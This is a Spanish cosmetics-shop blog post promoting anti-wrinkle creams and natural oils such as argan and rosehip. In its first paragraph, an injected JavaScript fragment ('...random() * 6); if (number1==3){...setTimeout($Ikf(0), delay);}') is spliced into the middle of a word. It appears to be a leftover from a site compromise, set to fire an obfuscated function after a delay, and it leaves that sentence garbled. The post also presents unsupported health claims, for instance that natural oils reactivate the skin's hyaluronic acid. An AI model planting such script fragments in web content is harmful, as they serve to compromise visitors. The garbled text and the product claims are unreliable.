Categorí­a Blog

Beneficios de la crema antiarrugas

La crema antiarrugas contiene innumerables beneficios

¿Quién no ha soñado nunca con la eterna juventud? Desde la edad de los antiguos egipcios, la conservación de un rostro joven y saludable ha sido uno de los grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andes sueños de la humanidad. Nuestra piel refleja quiénes somos y es reveladora de nuestro estado de ánimo y de salud. En LikaBio te mostramos los beneficios de la crema antiarrugas que te ayudarán a conservar una piel lúcida y joven.

Para miles de personas, prevenir las arrugas y líneas de expresión se ha convertido en una tarea fundamental y más en los últimos años con la creciente importancia de la imagen en nuestro mundo actual. Para ello contamos con un aliado eficaz, la crema antiarrugas, que utiliza técnicas revolucionarias y permiten resultados inmediatos en nuestra piel.

Cómo combatir los síntomas de la vejez con la crema antiarrugas?

Por lo general, los primeros síntomas de envejecimiento que se hacen visibles son las llamadas “primeras líneas de expresión”. Estas aparecen en zonas activas de la piel tales como el contorno de los ojos, las líneas de la frente o en regiones contiguas a la boca y se acentúan con el paso del tiempo.

Para combatir estos elementos, debemos utilizar cremas antiarrugas 100% naturales y eficaces. La razón es muy sencilla. Nuestra piel segrega de forma natural un fluido orgánico llamado ácido hialurónico, cuyas moléculas poseen la capacidad de retener el agua en un porcentaje equivalente a miles de veces su propio peso. Es la clave de la hidratación y firmeza de nuestra piel. Esta sustancia ya se encuentra en nuestro organismo, sólo que va disminuyendo con el paso del tiempo. Por esta razón, productos naturales como el serum facial de argán, el aceite de argán, el aceite de rosa mosqueta, el aceite de árbol de té o el gel de aloe vera contribuyen a la aportación extra de propiedades que ayudan a reactivar nuestro ácido hialurónico y a combatir las arrugas y los síntomas del envejecimiento en la piel.

No obstante; cabe recordar que la calidad de la piel también se adquiere por elementos genéticos y se mantiene a lo largo del tiempo, dependiendo de los cuidados que ésta reciba. Las buenas normas de higiene y estética son necesarias para mantenerla tersa e hidratada. Anteriormente en LikaBio escribimos en el blog un artículo sobre cómo hidratar y rejuvenecer la piel que os puede servir de utilidad.

Por último, os animamos a promover el cuidado de la piel ya que pueden llegar a reflejar la historia y calidad de vida de una persona. Con ayuda de la crema antiarrugas natural podemos conseguir este deseado cuidado. Recordad, cuidar nuestra piel es cuidarnos a nosotros.

Etiquetas: , , ,